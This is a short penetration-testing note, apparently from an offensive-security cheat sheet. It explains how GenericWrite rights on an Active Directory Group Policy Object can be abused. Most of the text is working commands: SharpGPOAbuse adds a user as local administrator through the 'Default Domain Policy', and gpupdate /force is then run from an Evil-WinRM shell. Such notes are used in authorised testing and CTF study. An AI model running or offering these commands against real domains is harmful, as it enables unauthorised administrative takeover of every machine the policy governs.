Last updated 2 years ago
If we have GenericWrite to a GPO.
We can exploit this by using the SharpGPOAbuse.exe
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
Them we force the update.
*Evil-WinRM* PS C:\Users\anirudh\Desktop> gpupdate /force
